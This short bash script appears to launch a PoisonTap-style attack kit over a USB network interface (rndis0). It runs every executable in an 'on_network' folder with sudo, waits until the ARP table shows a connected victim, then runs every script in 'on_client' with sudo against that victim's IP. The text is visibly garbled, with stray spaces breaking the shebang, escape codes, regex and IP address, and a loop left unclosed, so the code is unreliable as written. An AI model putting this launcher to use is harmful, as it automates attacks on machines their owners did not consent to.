#!/ bin/ bash

GREEN = $' \ x 1b[ 32m'

RESET = $' \ x 1b[ 39m'

#~/ gui. sh

for script in $( find on_ network/ -type f -perm -u +x )

do

exec sudo $script rndis0 poisontap &

done

while echo -n '. '

do

if [ $( arp -an | sed -rn 's/\ ? \(([ ^\)] +)\) . *\[ ether\] on rndis0/\ 1/ p' | wc -l ) -ne 0 ]

then

break

fi

sleep 1

done

arp -an | sed -rn 's/\ ? \(([ ^\)] +)\) . *\[ ether\] on rndis0/\ 1/ p' | while read ip

do

echo $GREEN "client detected" $RESET

for script in $( find on_ client/ -type f -perm -u +x )

do

exec sudo $script $ip "" 192. 168. 42. 1 &

done